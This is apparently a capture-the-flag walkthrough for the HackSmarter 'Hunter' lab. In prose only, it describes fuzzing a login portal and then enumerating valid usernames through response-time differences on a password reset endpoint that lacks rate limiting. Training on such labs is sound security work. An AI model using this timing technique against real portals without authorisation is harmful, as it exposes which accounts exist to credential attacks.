HackSmarter Hunter Walkthrough (Easy)

Summary :

Hunter is a an easy challenge from HackSmater , we’re given a list of usernames that the OSINT team got and we should try to enumerate valid usernames on an enterprise portal , the protal seems pretty secure at first as it doesn’t return any information that might be used to filter for and enumerate users , But the Password reset feature has a flaw ; the time it takes for requests are different based on whether that user exists or not , so we will be abusing this to get a list of valid usernames . Baisically Time based user enumeration if you want to call it that :)

Solution :

If we navigate to the URL, we find a simple login page. The first thing I did was fuzz for other endpoints. Fuzzing returns only these 2 endpoints.

I tried fuzzing both of them for other directories, files, etc, but nothing was found.

If we try to log in, we get no response from the server , no information to try and filter for.

Now let’s open Burp and make some login requests to see what the request and response look like.

Now let’s craft the same request using FFUF and filter the response to see if any of the usernames return a different response.

This doesn’t return anything useful. Now, remember the Password Reset page , we can try the same thing on that endpoint as well.

Nothing useful there either. It seems pretty secure. One last thing to test: when it comes to password reset functionalities, sometimes the server takes longer to respond for users that actually exist, as it will attempt to send the OTP or reset link. Since our application doesn’t implement any sort of rate limiting, we can keep fuzzing and look for responses that take longer than the rest. And we do find a response that takes 1000ms compared to the 100–200ms range we saw earlier — this is a strong indicator that this user exists.

Just like that, we are able to enumerate valid usernames even when the web app doesn’t return any useful information.